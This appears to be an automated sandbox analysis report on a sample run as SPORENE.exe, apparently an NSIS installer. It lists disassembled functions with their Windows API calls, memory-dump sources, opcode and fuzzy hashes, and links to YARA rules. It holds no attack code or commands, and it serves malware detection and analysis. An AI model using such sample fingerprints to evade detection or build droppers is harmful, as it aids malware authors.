Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-2132619167
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500, Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,?,773123A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,0042C248,00000000,?,773123A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,77313420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,77313420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,77313420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816
C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(0001FFD3,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402950, Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E, Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 41w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77313420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 41w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77313420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 41w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77313420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

41w, xrefs: 00405F16
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 41w$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3365995897
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

